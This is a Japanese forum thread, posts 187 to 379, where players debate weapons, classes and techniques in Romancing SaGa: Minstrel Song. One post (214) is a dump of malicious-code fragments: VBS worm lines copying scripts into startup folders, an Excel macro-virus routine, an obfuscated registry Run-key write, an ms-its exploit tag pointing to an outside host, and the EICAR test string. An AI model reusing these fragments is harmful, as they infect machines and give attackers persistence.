ようするにロザ重強すぎなんだよな
硬さと強武器
ロマ2の玄武陣みたいなかんじ

188 :
ラピッドは素早さ−の上ボーナスが先制攻撃のみのゴミ陣形

189 :
ロマ2って玄武陣あったっけ?

190 :
忘れてた行動後スタンだから立て防御も不可
玄武陣は3だね
そんなに強くない

191 :
ようするに剣士強すぎなんだよな
抜群の火力と素早さ
ロマ2のアマゾンストライクみたいな感じ

192 :
>>188
ラピッド+SS は凶悪すぎるよ

193 :
>>192
SSってストーンシャワーか?打属性だからアマゾンで攻撃ボーナス付くぞ
ラピッドは霧隠れ+即死技と一部ボスでしか使えない

194 :
俺は海賊の速くて強い全体技撃ってりゃ
中盤までのザコはとても楽なとこを
ラピッドっぽいっていったんだよー
ラピッドの他の側面をどうこう言われてもしらんよ

195 :
ようするに竜人強すぎなんだよな
モード効果強調
ロマ2の龍陣みたいな感じ

196 :
竜人は大型剣にとって神のようなクラス
そう思っていた時期が俺にもありました

197 :
SSってなんジャロ

198 :
弓はどうだろう?
進行度による自動解決もないウハンジ水竜イベで確実に藤娘が手に入るのが嬉しい
まあ技が弱いからこのスレでは論外か

199 :
>>198
フェニクスアローと針千本とミリオンダラーとアローレインとイドブレイクと
スプラッシュアローに誤れ!

200 :
武芸家で針千本(゚Д゚)ウマー
ミリオンダラーの全体攻撃も(゚Д゚)ウマー
クジャ弓・OD連射×5でも1万近くいくし、なかなか使い勝手がいい。

201 :
クジャ弓は連射用とフェニクスダラー用に2つ作ったよ

202 :
弓は最初から最後まで安定して使いやすいな。
能力変化、即死、序盤中盤後半それぞれの全体攻撃、回復、後列、威力(加撃付き)、コスト(ザップ)、速攻技。
万能型武器。防御面の弱さは後列+後半フェニックスでカバー。
惜しむらくは武芸家を活かせる無足加撃技が少ないことか。

203 :
連レス失敬。
武器が高いのがアレなんだけどな('A`) 。
でも早いうちにドビーの弓が手に入るからまだいい方か。

204 :
知らない内に大型剣厨が消えてる、残念。
ぶっちゃけクラスがunkoだから使えん。せいぜい城塞くらいだし。
>>171は持論がすでに終わってることに気づいての発言だったのか。
弓はクラスに恵まれてて、選択の幅が広いのが良いな。
さすがに海賊は非対応だが。

205 :
>>201
どっかに売ってる。
19999金。

206 :
弓は普通に使うならクジャ闘士一択だね

207 :
ラピッドは雑魚戦で鬼のような強さを発揮するんだよね
ようするに帝国正騎士弱すぎなんだよな
微妙スキルと弱特性
ロマ1の細剣みたいなかんじ

208 :
大型剣は技がいいものそろってるし、かなり使えると思うぞ。
クラスはほぼ城塞一択だから不動剣も長剣から閃けばよろし。
武器の威力なんぞ気休め見たいなもんだから、青の剣なんぞ発掘せんでも
スカーブ山で羽回収ついでにローザリアサーベル拾ってくれば済むこと。
炎のロッドの火の鳥で雑魚一掃は魅力的だが、フラーマ出るまでまたにゃならんし、
タイラント師匠に技を伝授してもらって(ここまで雑魚戦はほぼないだろう)
合成サイコや拾い物のサブ武器から全体攻撃打ちまくってれば大抵一ターンでかたがついてしまうので
一人旅でもしない限り言うほど必要でもないだろう。
そして一人旅するにしても炎のロッドの火の鳥は強すぎて、せっかく縛りプレイしてるのに
さほど厳しくなくなってしまい萎えるので、結局封印してしまったりする。俺の体験談だが。
強いのは強いが、見方によっては半端なポジションの技だとおもう。

209 :
明らかに大型剣の方がハンパだろ…。青の剣以外は武器もショボイし…。
ロザサベ拾いに行くよりも、レイピアをジャミルから奪う方がはるかに楽。
そもそも盾使えないから攻撃重視、かと思いきや剣士は非対応。
わざわざ払車を覚えるより、火の鳥をフラーマから買う方が早い。
しかも青を度外視するなら、長剣と両手大剣両方持った方がはるかにマシ
せめて、これ一本で両方の技が使える!を強調すれば理解も出来るのに。
つーか強すぎて萎えるとか意味不明。

210 :
どの武器が最強でもいいけど、ここの連中は武器を語る以前に己に対する
熟練度が低いのだ
過去スレの神々は細剣一本を手に取り、想像を絶するほどの精神的苦難
を幾度となく乗り越えながら何十週という回数をクリアしてきたという
10週細剣だけでクリアして己の精神の壁を乗り越え、20週を超えた
あたりからは細剣の奉られる無我の境地へと足を踏み入れ、30週に
達する頃には己の精神が細剣に適材としてなじみ、40週を超えて始めて
細剣と一体になれるのだという、そこから己の身と魂で敵を刻み倒してゆくこと
幾成層、50週を迎えたころ天界からの後光が差し伸べられ初めて神と
認められるのである

211 :
大型剣は俺の思い入れ。別に何より強いってことではなくて
ただ改造できる最強武器が実質ローザリアサーベルでもたいした問題ではないですよってこと。
細剣より強いといった覚えはないし、なぜ食って掛かってくるのかわからない。
細剣が強いのは認めるが、ロッド火の鳥で雑魚は毎回一ターン殲滅じゃ面白くもなんともないし、
もっとパーティに彩りを出していろんな技でも使いながらのほうが楽しいんじゃないかってこと。
強さと楽しさは別だよな、ってことが言いたかっただけ。

212 :
>>209
>青の剣以外は武器もショボイし…。
攻撃性能なんて飾りです。利便性を重視する細剣信者にしては変なことを言うね
>ロザサベ拾いに行くよりも、レイピアをジャミルから奪う方がはるかに楽。
羽回収は多くの人が通る道、ついでに獲るのに苦労なんてないに等しい
>わざわざ払車を覚えるより、火の鳥をフラーマから買う方が早い。
進行度45%にならんと手に入らない術より、小羽、炎帝師匠に弟子入りしたほうが
はるかにはやくに閃ける。ついでに消費BPも火の鳥よりすくないな
と、まぁ反論してみたものの、正直細剣はオールラウンダーな武器と言えるけど
大型剣は器用貧乏って言葉がぴったりだと思う。

213 :
・・・レベル落とそうや
厨が疎外感を感じてしまうじゃないか・・・

214 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
5 6 7

215 :
大型剣は細剣スレで吠えてるのがお似合いですよね^^

216 :
>>212
大型剣は器用貧乏と言えるほど戦略に幅が無いと思うんだ。
サブウェポン抜きだと城塞騎士一択・ステ低下技無し&D技充実・武器に特殊な物(術具など)無しとくれば、必然的にD技でディフレクト狙いになるだろうし、それ以上の事があまり出来ない。
似た戦略を取る事が多い長剣に対してのアドバンテージが少ないのも痛い。好きなんだけどな、大型剣。
細剣は確かにオールラウンダーだな。ロッド火の鳥に関しては、進行度45%っていう絶妙なタイミング(BP的に)で「確実に」習得出来る堅実性も長所のひとつだと思うから、まあどちらも優秀なんじゃないか。

217 :
>211
ここはあくまでも、真面目な語りがあったとしても、ネタスレであると言う事を忘れないで欲しい。
もっと高らかに大型剣への思い入れを。青の剣最強を歌い上げてもらってかまわない。
ここの細剣使いたちもそんな相手と切り結ぶことを望んでいるのさ。

218 :
何度でも言うぞ、バーバラにロペラ変幻自在はガチ。
尻の肉感も堪能出来るし

219 :
n

220 :
>思うんだ。
この表現見ると、
「まだ逃げ遅れてる奴がいると思うんだ」の台詞が頭の中で再生される
やばいミンサガ末期ぽい

221 :
細剣はまさにオールラウンダーなんだが、変幻自在の消費BPの多さがたまに傷だな。
雑魚戦の場合は数ターンで終了するので特に問題ないんだが、
辛サルみたいなラスボス級の敵と戦う場合に、運悪く聖杯が使用できない状況
になってしまいBP切れする場合がある。
変幻自在の消費BPは最小まで減らしても13。
BP回復+7のキャラが使う場合でも2ターンに一回しか使えないので、
1ターンあたりのダメージ効率が異様に下がってしまう。
まぁ、いちゃもんレベルだが、スレの徒花にでもしてくれや。

個人的には、大型犬よりも体術の方がオールランダーには向いてると思う。
全体攻撃がないという欠点を持つが、

・打撃に強い敵にもよく効き、連携しやすいイナズマキック。
・楯・ディフレクト回避不能の三角キック、三龍旋。
・加撃・無足による偶然連携狙いのスピアー。
・高ダメージの羅刹掌。
・高性能なステダウンできる技。
 ・魔法楯を貫通し、力を下げ、加撃にも派生できるサブミッション。
 ・知性ダウンかつ高威力なシャインインパクト
・体力回復+HP自動回復させる練気。
その他にも
・全体的に低BPコスト。
・タイラント道場でほとんどの技を序盤に習得可能。
・細工師。
・ゲッコの騎士でカウンター。
などなど、使いやすいよ。

222 :
>BP回復+7のキャラが使う場合でも2ターンに一回しか使えないので、
>1ターンあたりのダメージ効率が異様に下がってしまう。
>
まちがい。
2ターンを1周期として技をループさせる場合、変幻自在+(消費BP1の小技)となるため、
1ターンあたりのダメージ効率が異様に下がってしまう。

223 :
変幻自在は消費デカいけど、安定して高威力という点だけはハズレ無しだからなー。
真サル相手にはDモードで電光石火、共震剣、変幻自在。
もしくはAモードで電光石火、変幻自在。ゴリ押しにTモード変幻自在だなぁ。
それと、体術は消費はデカい方だと思うぞ。
真サル相手には錬気での回復、サブミッションは必要不可欠と俺は思っているのだが。
LV5でもサブミッションで3、錬気で5、羅刹掌で10、キック2種が5。
…結構使う方じゃないか?盾は水鏡を使えないのはちょっと残念だ。
個人的には錬気、サブミッション、スピアー、三角蹴り、羅刹掌を高く評価しとる。

224 :
両手斧大好きの俺様が両手斧の地位を向上させるべく華麗に参上だ!
まず術具!君主の大斧があるため、速度威力補正つきで火の鳥が撃てるぜ!細剣のが速いがな!
クラス!ゲッコの騎士は特性が死んでるが、帝國正騎士はそうでもねえぞ!
直前の攻撃から連携しやすいときた!連携しやすい火の鳥!だからどうした!
技!まず富岳八景はこいつからしか使えねえ!最高にロマンシングだろ!?
アパスマ、グランドスラムも使えて隙もねえぜ!
かかと切りでソウルドレイン、次元断でゴーストシップにも対応だ!
雑魚一掃のお供にブレードロールも使えるぜ!
序盤攻撃がミスりやすいだと?安心しろ。そんなヘタレのために両手斧は
腕力の上がりやすさは全武器中bP!馬好き女や街角の記憶喪失野郎でも
安心して使える仕様になってるんだぜ?ついでにHPもあがって死ににくい体に!
どのみち出来の悪い脳みそならはなから見切りをつけて両手斧、これ最強。
……だめだ、これ以上はテンションが続かねえ。

225 :
お前は面白いヤツだな。ちょっと両手斧が好きになれそうだ

226 :
これは細剣厨も反論の余地が無いな

227 :
>>224
そのテンションでまず気圧されたが、言ってる事は凄くまともだなw
他にアクセルターンが閃き易いからアパスマへの派生が優秀な点もささやかながら利点だと思う。
ディフ無しは体力馬鹿な成長補正で有る程度カバーできるとして、欠点は武器の価格とクラスあたりか。
意外に色々な事やれるよね、両手斧。

228 :
ちょっと両手斧を使ってもいいかな。って気もする。
ゲラ=ハ好きだし。
別に2chなんかの影響を受けたりはしないんだが。

229 :
術士にオーバーソウルこそロマンシング

230 :
にわかに両手斧が人気者に

231 :
>>228
ツンデレか?
ちなみにゲラ=ハと両手斧の組み合わせはまさに男の中の男ぞ。
ゲラ=ハも両手斧もHP、腕力、体力の成長率は最高クラスときてるからな。
万能成長で細剣使って何でも出来ますよとしたり顔のカッパより何十倍と男らしい!
海にしか生きがいを見出せなかった荒くれものの集まるパイレーツコースト、
その中の男の中の男、キャプテン・ホークともあろうお方が本当にそんなことでいいのか?
ゲラ=ハはそんな軟派なキャプテンについていけるのか?否!断じて否だ!
陸に上がって干からびたカッパにキャプテン・ホークの魂を呼び戻させる、そのための両手斧だ!
BP成長率が死んでいるだと?足りないのはBPではない、貴様の戦闘回数だ!
素早さの値が微動だにしない?男がどっしり構えてなくてどうする!
器用さが終わってる?足りないのはプレイヤーの当てようとする気迫なんだよ!
信じられない勢いで伸びていくHP、腕力、体力。微動だにしない器用さと素早さ、見るのも辛いBP!
これこそが男の証、真の海賊!キャプテン・ゲラ=ハが誕生するときも近いぞ!
……ああ、トカゲに両手斧は棘の道ですよってことが言いたいだけだから。

232 :
いやあ、久々に漢の熱い生き様を見た気がするぜ

233 :
ロッド集めしようとおもったけど財宝の地図がでねー!

234 :
>>231
WAスレ住民の匂いがする!
両手斧とりあえずジャァァンで富岳八景。正騎士で細剣と並立すれば器用さとかも気にならないし。
いや、やっぱ両手斧単独は厳しいわ実際

235 :
>>224はよかったけど、>>231はちょっとなぁ…。
オマエは単にゲラ=ハが好きなだけじゃねぇの?

236 :
こういうつまらない事いうのが細剣厨なんだよな

237 :
俺は体術・長剣派だがな

238 :
バーバラ派か

239 :
初めて細剣抜きでプレイしてるけど、中盤以降の難易度が一気に上がるな・・・
何も考えずにロッド火の鳥2〜3発で終わっていたバトルが毎回こんなに
長く、厳しいものとは・・・
ロッド火の鳥で瞬殺していて名前も姿もロクに覚えていない敵が
こんなに手強かったとは・・・
電光石火で焼き殺していた魚がこんなに堅かったとは・・・
今改めて細剣のありがたみを痛感している('A`)

240 :
別に細剣無くても、術封印じゃないならそこまで変わらないと思うけどなー。
クジャ闘士+翼の槍とか、合成吹雪や杖経由合成サイコでザコ潰し。
電光石火はそもそも小型剣で出来るし。前衛棍棒の土竜撃だって使える。

241 :
分解して見てみれば、細剣が持つ強い部分はある程度代用になるものが有るからね。
でも、一つの武器種で色んな事が出来るのはやはり大きい。極端に何かが飛び抜けているんじゃなくて、『他の武器でも出来るが強力な行動』を多く使える事が細剣の強さなんだと思う。
勿論威力or素早さっていう重要な要素を強化出来るクラスに対応しているのもあるだろうが

242 :
火の鳥、一週目は使ったけど二週目以降は合成サイコだけで十分だと思った
というか細剣は低BP+EP消費ゼロでなかなか使える技が多いから火の鳥使うのがもったいない気がしてしまう
個人的に細剣のよさにもう一個、盾使えることも上げときたい
たかが盾されど盾
素早く盾もあり全体攻撃もあり低BP+EP消費ゼロの使い勝手良い技もあり全体的に技をひらめきやすく総合したら強いよなあ
弓も好きなんだが盾使えないところがネック、どうしても片手武器に比重を掛けてしまう・・・

243 :
水鏡の盾使えれば心の闇も防げるからな。盾使用可能は大きい。
ダークネビュラやゴッドハンド、術の類は防げんけどさ。
最も、水鏡使えなくても竜麟やマルダーで十分って輩もいるだろうが。
ロッド火の鳥の一番の長所は、敵からほぼダメージを受けずに
高威力を発揮出来るということだからなぁ。術具の特性の代用だけは出来んよね。

244 :
バルハル南の洞窟のペギー夫妻+その他を早い段階で倒すとなると、
ロッド火の鳥は欠かせない。
水の精霊のウォーターガン、鯖折りが強すぎる。
だから進行度45%までに南の洞窟3段階をクリアできたことがない。
何かいい方法はないもんかな・・・
合成術以外で。

245 :
夫妻はセルフ盾でほぼ無力化できるから、水の精霊さえ始末できれば。
合成術以外では、タイラント師匠で払車剣閃くくらいしか。

246 :
そこに襲いくる生命波動

247 :
あるあるw

248 :
つい今しがたそれやったよ。
結局フラーマだしてロッド火の鳥でバーンした。やっぱロッド鳥は神だわ。

249 :
>>248
それが5本もある幸せ
無駄というなかれ
これぞ愛

250 :
でてこい!打槍使い!!

251 :
まぁウコムの鉾の性能は炎のロッドとも肉薄するからな…。
終盤でしか入手出来ない点と、打槍の対応クラスがアレな点が足を引っ張るが

252 :
>>250
λ<ゴキゲンイカガカナ

253 :
ODと相性良いのは、水竜剣(小型剣)とウコム(打槍)。
回復しつつ電光石火とか変幻自在、無双三段とか脳削りとか。
どっちも炎のロッドと比べて取り辛いし、終盤になるのが痛い。
ただ、俺が洞窟ジュエビ撃破する時に水竜剣は必須。細剣など出る幕はない。

254 :
あー、俺ODとかQTとかディシーバに頼ったこと無いから、そういう感覚分からないやw

255 :
>>254
ジュエビにそれら術が必要ないとは…、猛者だな。

256 :
水竜剣があるなら水竜呼んだほうが駱駝とおも

257 :
いや、むしろ裏化してオーバーソウルを使いこなしてこそロマンシング。

258 :
あ、あれ?何だろう?
8週目にして電光石火のミスり具合が妙に気になってきた‥
命中補正はDで標準(ちょっと低)のはずなのに。
ウぐォー!ヤ、ヤメロ!
俺は別にあそこで外したのを恨んでなんか!だ、だから乗っ取るのだけは‥
ら!らめェ!!! プ‥プ‥プ・・・


  _  ∩
( ゚∀゚)彡 プラズマショッツ!プラズマショッツ!
 ⊂彡

259 :
オマエうぜーwwwwwwwwwwwwwwwwwwww




フリーレ様に大地の剣はガチ

260 :
フリーレはモーションがアイシャタイプなのが解せん
どう考えてもバーバラタイプでしょ

261 :
>>260
すました顔して内心では
「なにこいつ、きっもちわるーい><」
とか思ってるかもしれんぞ。

262 :
  _  ∩
( ゚∀゚)彡 プラズマショッツ!プラズマショッツ!
 ⊂彡

楽しいなこれww
ジョルジュ初出のころを思い出すw

263 :
弓厨に理論派はいそうにないな。
残念だ。
もっとこう、細剣信者である我々を唸らせるような
他武器のプレゼン出来る奴はいないのかね。

264 :
>>263
>>224

265 :
>>224には好感持てるよな。

266 :
まぁ確かに細剣は強いのだが、ことマサル戦に限って言えば細剣である
必要がないのが事実だ
いつか細剣の君人がおっしゃった「極限状態のバトルにおいても
決して屈することのない、粘り負けしない底力」についてもいくつか疑問符が
残る
先手必勝というご意見はもっともなのだが、1ターンで仕留められる敵で
なければ反撃を食らうのは必至であり、この場合先手必勝の図式は成り立たぬ
なるほど最強の中技理論についてもなかなか興味深い側面もあるが、これを
BPコストとして捕らえているのならば成長率の高い中技ならば終盤には
大技にも匹敵する火力を有するものだ(共振剣とか)
「火力とかそんなものだけが武具の強さを示すのではない」なるほどそれも
また事実。術具の存在、水術併用、最速リヴァイヴァ、これも炎のロッドの
なせる業。
しかしこれもLPを根こそぎもっていくマサル戦では最速リヴァイヴァも
意味をなさないケースも多い。水術についても術具経由でいかなければ
先手は厳しい場面だ、それならば水龍剣やウコムの鉾に頼るのが正解では
ないのか。
ロッド火の鳥の威力は序盤ではバグ級の代物ではあるが、実はブレードロール
とアローレイン程度で中盤までは十分乗り切れるし、終盤にもなると火耐性
の高いやつらも出てきて、払車剣の方が面倒がない
自己ディフレクトのみの細剣はDモードにしてもゴッドハンドの猛威を
打ち破るには少々物足りない。やはりここは素直に長剣Dモード不動剣に
頼ってもいい場面ではないのか。

267 :
>>264
暑苦しいだけ。
両手斧を売り込もうとする熱意だけはビンビン伝わってくるが、どうも必死すぎ。
しかしながら、他武器をけなすのではなく、両手斧の持つ魅力をひたすら熱く語るという、2ちゃんらしくないスタイルには好感が持てる。
まあ、他武器との比較は大事な事なわけだから、その辺りもう少し具体的にしてもいいかも。数字を用いるなどして。
よし、次周での使用を前向きに検討してみよう。

268 :
どうなんですか?
剣士派の皆様も、マサル戦の前にはこっそり炎のロッドからディフェンダーに
持ち替えて、精霊石の杖をかかえこむのが現実なんじゃないですか?
これは決して恥ずかしいことではありませんよ。
君人はいつかこうも言った「己の精神が細剣に適材としてなじみ
細剣と一体になれるのだ」
なるほど、せいぜい8周程度しかこなしていない小生にとっては耳の痛い話だ。
だが、あなたがこれまで信じて打ち続けた補強素材ははたして本当に適材
だったのだろうか。細剣を愛するあまり、他武器を寄せ付けぬまま
細剣煉獄へと落ちていった汚れた魂がアナタの正体ではないのですか?

269 :
あなた達は世界中を細剣の楽園にするために書き込んでいるのですね?
我々にも細剣の住人におなりなさいと?
ここの空気も、あなた方の言葉も全てまやかしだ!
細剣で人を支配する、そんな世界のどこが楽園だ!

270 :
>>267
別に、他武器と比較して理論的に両手斧の強さを実証しよう、
なんて>>224はハナっから思ってないと思うよ。
必死とか的外れなこと言ってるけど、正直ネタ半分でしょ。
なんか突き抜けちゃってる感があるから、ネタとして面白いし、
好感が持てるから、そういうレスも付いてる。
はっきり言って理論的に両手斧の強さを実証するなんて無理だろうしなww
具体的に、とか言ったら可哀そうだ。ただでさえ自虐ネタなのに。
正直、細剣厨の頭でっかちな論理や、>>266みたいな冗長なだけの反論は
必死さがキモいだけでつまらん。
もっと>>244みたいな面白いやつが出てきてくれた方が嬉しい。
そうなってくるともうスレ違いだけどなw

271 :
グダグダごたくはいいから細剣武勇伝の一つでも語ってみろや

272 :
ちょwwwwwwオレ細剣信者じゃないしwwwww

273 :
ところで>>268の元ネタって何?

274 :
構ってもらえないからってファビョるなよw

275 :
>>266,>>268
変ニな文章で話の要点が解り辛いんだが、要するに真猿戦では長剣の方が強いよ!
って言いたいのか?

276 :
払車が強いとか言ってるから、長剣ではないのかも知れん

277 :
とにかくアンチ細剣なだけなのかもしれんぞ。

278 :
両手斧・・・
なんだか使ってみたくなったぞ。
しかし、問題はクラスか。
ゲッコ騎士辺りが無難なのかな?
4人剣士、海賊一人の組合せで4周目まで来たけど次はゲラハ入れてみるぜ。
ちなみに俺は細剣派。

279 :
ゲッコの体術メインでサブ両手斧でいいんじゃない?
全体攻撃したかったら両手斧とか。

280 :
>>278
ゲッコの岸だと必要ジュエルは少ないけど、
クラス特性が生かされないよね。
帝国正騎士が無難じゃない?
そんな漏れはホークを毎回帝国正騎士にして
両手斧ブンブン振らせてます。
リメイク前は下っ端海賊も両手斧持ってたのに、
今回は無いんだもんなぁ。残念。

281 :
いろんなクラスを使ってみて
結局、全員剣士ってのが最強なんだと再認識した
序盤の道場で払車剣さえ覚えれば、後は惰性で何とでもなる

282 :
ならば君はその道を極めればいい
俺の選ぶ路線は最速行動を優先するので、剣士軍団とは違うものだが

283 :
LV5剣士のヴァンダの火力は異常

284 :
上げんなデコ助

285 :
ほうデコ助とな

286 :
ここはage推奨だと知らんのか・・・

287 :
最強はロザ術×4+エスタミル古流闘士

288 :
クラスについて語るスレではない。

289 :
細剣厨はつまんない人間

290 :
詰まってる人間は何を使っているのか、これがわからない。

291 :
衝槍に決まってるじゃありませんか!
一撃必殺の毒妙転結!
加撃の威力に酔いしれる積載武人!
下り飛龍のロマン、流星衝!
知力低下が何のその、マリス鳥!
これほど愛に満ちた武器があろうか!

292 :
翼の槍吹雪じゃねーのかよw

293 :
じゃねーよw

294 :
知力低下術具大杉

295 :
フリーレ様に大地の剣はガチ

296 :
ホーク船長に炎のロッドはガチ。
攻撃はフランシスカだけど。

297 :
片手斧はロマンシングも、序盤から終盤までの使いやすさもイイ!
ステ補助も全体攻撃も即死もそろっていて便利。
武器も楽に手に入る。クラスも優秀。
ただディフレクトが出来ないのが唯一の心残りだ。

298 :
久しぶりに来たら細剣推進会…恐るべし…

299 :
あんまり推進されてないような気もするけどな

300 :
前スレの方が推進っぷりがスゴイからな。

301 :
まあ、細剣が便利かつ強力なのは事実だけど、それだけだからな。
もう語りつくされて、あとは半分ネタ化した他武器推進でスレの半分くらいが埋まってるしw
正直、武器防具スレとかチラ裏と大して変わらんクオリティ。

302 :
細剣たん(;´Д`)ハァハァ

303 :
由美たん(;´Д`)ハァハァ

304 :
誰だよw

305 :
クジャラート由美最強!

306 :
いや…マジキモイわ

307 :
麻里たん(;´Д`)ハァハァ

308 :
今度こそ誰だよwwwww

309 :
麻里ストリク最強!

310 :
月美たん(;´Д`)ハァハア

311 :
もういい

312 :
真面目にやれ、厨房!
化石魚相手に小転乱発してるがサザン閃かねぇぇ・・・

313 :
>>313
つ三星衝

314 :
卯子無たん(;´Д`)ハァハァ

315 :
もうここもダメかもね
細剣の使徒達が去ってからここも寂れたものだ・・・

316 :
まあぶっちゃけ駄目だなw

317 :
最初からわかってたことだろw
ここまでもったことの方が奇跡だ

318 :
ぶっちゃけトマホーク軍団だけでクリアできね?

319 :
>>318
弱すぎない技であれば、どんな技でもクリア可。
カットインだけでも可能だ。
それがミンサガクオリティー。

320 :
ライトニングクイックの火力は大技をも凌駕するぞ

321 :
あれ…ライトニングクイックってそんな強いっけか?
せいぜい1.2kがいいとこだと思ってた

322 :
それより、ウェアバスターって技知らない奴いるだろ?
俺は3周目で知ったんだが。

323 :
あるのは知ってるが使ったことない。強いの?

324 :
ダメージ300いくから道場未使用時にそこそこ役立つ。

325 :
フリーレ様に大地の剣はガチ

326 :
炎のロッド経由の3術合成火の鳥が強すぎて脳汁噴いたwww
全体に4000ダメージとかありえん。
同経由クリムゾンフレアは2500。
アイスソード経由3術最強吹雪は3000だな。

327 :
炎のロッド経由だと細剣スキル依存ってのは知ってるけど
知力に依存する?器用さに依存する?

328 :
>>327
基本威力は武器の攻撃力
参照能力は知力

329 :
>>323
最終試練の獣人に使ったらダメージ1000超えた。

330 :


331 :
>>326
どういう組み合わせか分からないのだけど
けっこうLP喰うわけだよね?
LPコストにこだわらんのなら
補強財アビスクリスタルとかでやってんのかしら?

332 :
ロッドは鍛えてないし樹精結晶だよ。知力は63だったかな。前列。
種族特攻が効くと大抵4000以上はいける。そうじゃなければ3000〜3500かな。
LP消費赤1。アイスソード経由吹雪はLP2喰うのでオススメしない。
BPは自分の火の鳥は21だったがスキルレベル5じゃなかったのでもうちょい下がるはず。
以前に火の鳥で5000行ったという話を聞いたけど、知力+武器威力MAXだったのかね。

333 :
私はフレェ〜イムタイラント
訪れた333、ゲトせねばなるまい

334 :
>333
まぁゆっくりしていけ

335 :
ヒント:武装弦楽祭&スペルエンハンス

336 :
炎のロッド+3は海賊や剣士だと当然火の鳥だけど
ロザ術だと、オーヴァドライヴ中に
変幻自在&リヴァイヴァが使えるのが大きいな。
ぶっちゃけ非術具のロペラ+3は、最終的には必要ないな。

337 :
水流剣の方が使えるよ

338 :
確かに、終盤になると細剣使わなくなる。
補強材馴染ませる為にがんばって使うが、ロペラにヴェルニーが馴染めば樹精結晶貼って終わり。
その後は殆ど使わない。
無駄だと分かっててもついやってしまう。
ま、自己満足ってやつか。
剣士はモーグレイ、ロザ重は長剣ってパターンが身についてしまってる。

339 :
終盤では火の鳥も効きにくい香具師が多いから払車剣になっちゃうんだよな

340 :
終盤は、ロザ術ダークの変幻電光用にしてる>ロペラ+3

341 :
>>322
威力は低いが盾防御以外では必中だからアムルアムト戦で役に立つ。
生命波動とか、消費BPの少ない攻撃術を持ってない場合のみだが。
序盤は行動の遅さ以外は文句無しに使えるな。武器自体強いし

342 :
3術最強スターライトFS(ビット5個)のダメージが5500だった。
実用性こそないけどね(´−`)。
エスパーダロペラはデッドストーン貼って剣士変幻自在電光石火がいい感じ。

343 :
刀ってあまり外さないな
加撃やら無足やら結構出るせいかな?
それでも火力さびしいから実用性は低いか
わーい三歌仙だぁ

344 :
ミンサガでサガフロの無月散水があって欲しかった

345 :
サガフロは雑魚だから

346 :
黄竜剣、清流剣が欲しかった

347 :
無月があれば、刀の価値ももう少し上がっただろうな

348 :
便身剣があればなぁ。
超閃きやすいのに、不動剣やヴァンダよりも強いから使いやすかったYO

349 :
今回の刀の仕様は調整ミスとしか思えん

350 :
長剣or細剣 衝槍or打槍 片手斧 弓+合成術or合成術×2
これでいい

351 :
マゾ気質の俺に最弱武器ベスト5をお教えください。

352 :
刀と刀と刀と刀と刀

353 :
曲刀、両手斧、刀、棍棒、衝槍でどうぞ。

杖、小型剣、打槍あたりは結構使えるな。

354 :
>>351
曲刀、小型剣、杖、長剣(何故かトリックモード限定で)、刀
両手斧は、強撃、ブレードロールあるから序〜中盤は困らん
 後半はアバスマとグラスラあるから更に困らん

355 :
両手斧は中盤にさしかかっても攻撃が当たらないから困る。

356 :
そういえば極東って使った事ないや。今度の周で使ってみようかな。
無駄にツフあたりに使わせてみよう。なんか蛮族っぽいし。
棍棒はロバがロマンシング

357 :
杖はつえーよ

358 :
曲刀はダーク変幻がある。
アルドラルートだったら曲刀最弱だろう。

359 :
やっぱ、素手が一番弱い。
LB消費激しすぎる。
オーバーダイブしたあとにあぼーん

360 :
ドライブな

361 :
片手斧って攻撃力の高い技が少ない気がする

362 :
刀よりはましだろ

363 :
俺はフライ・バイ愛好家

364 :
加撃有りの拘束なブラぐらいだな。

365 :
細剣信者の反論がないぞ。
どうしたんだ?
このまま言わしてていのかよ。
ここは俺達細剣派のスレだぞ。

366 :
>>359
サブミとシャインだけで飯が食えるでしょうが

367 :
武器の強さはこんな感じかな?
S:細剣 片手斧
A:長剣 両手大剣
B:大型剣
C:杖 打槍 小型剣
D:棍棒 衝槍
E:曲刀 両手斧
F:刀

368 :
見事にロマンシング度と反比例してるな。

369 :
SとA、BとC、DEFはまとめても大体同じかな。
からすとうさぎの強さに最近注目している。

370 :
杖は電光石火と乱調子とからすとうさぎ使えていいぞ

371 :
EP0グラスラの両手斧、ダークの剣変幻自在の曲刀がEか・・・
どっちもこれ以外は見るべき技はないが。
富岳八景もロマンシンク系゙だし。

372 :
衝槍と打槍に優劣付けるのは難しい
どっちもどっちな気がする

373 :
体術はAかBくらいかな?

374 :
打槍は神雷 衝槍は翼の槍吹雪あたりに生きる道が
なに?合成サイコと吹雪、ロッド火の鳥で十分だと貴様・・・・・・

375 :
打槍の方がクラスに恵まれてる気がする
衝槍のはどれも使えん…

376 :
衝槍はロザ重がry
あと衝槍マリストリク火の鳥がいい感じ。翼の槍吹雪はやや威力不足。
技は…せめて流星衝がもうちょい使いやすかったらなあ。
打槍はウコムに加えて、無双三段がなかなか強いからいい感じ。

377 :
ロザ重だと前衛だしなあ…ゲッコなら素手で殴るし

378 :
打槍と衝槍共通で大車輪がありゃ少しは評価が上がったかもしれん

379 :
